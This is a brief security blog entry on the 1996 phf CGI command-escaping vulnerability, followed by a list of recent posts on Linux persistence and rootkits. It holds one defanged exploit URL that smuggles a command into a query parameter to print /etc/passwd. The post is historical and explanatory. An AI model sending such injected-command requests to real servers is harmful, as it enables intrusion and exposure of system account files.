The /cgi-bin/phf vulnerability is a command escaping vulnerability dating back to 1996.
It is trivial to exploit:
hxxp://server/cgi-bin/phf?Qalias=%ff/bin/cat%20/etc/passwd
https://insecure.org/sploits/phf-cgi.html
phf vulnerability
0001-01-01
Recent Posts
Linux Persistence: Modular Software
2025-04-17 DFIR CTF persistence linux persistence apache asterisk
Linux Persistence: Web Shells
2025-04-16 DFIR persistence webshell linux persistence webshell apache nginx PHP
Linux Persistence: Rootkits
2025-04-15 DFIR persistence rootkit LKM linux persistence LKM rootkit LD_PRELOAD kprobe ftrace ld.so hooking
Defanging Linux LKM Rootkits With cleanup_module()
2025-04-05 Linux LKM rootkits EDR hooks incident response Linux LKM rootkit